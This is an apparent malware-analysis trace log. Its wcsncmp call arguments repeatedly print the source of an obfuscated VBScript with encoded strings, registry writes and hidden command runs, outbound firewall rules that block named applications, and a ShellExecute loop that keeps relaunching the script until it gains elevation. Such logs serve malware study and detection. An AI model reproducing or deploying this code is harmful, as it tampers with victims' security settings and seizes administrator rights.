1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0226.373] wcsncmp (_String1="EIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.373] wcsncmp (_String1="IBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0226.373] wcsncmp (_String1="BSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 53 [0226.373] wcsncmp (_String1="SCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0226.373] wcsncmp (_String1="CV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 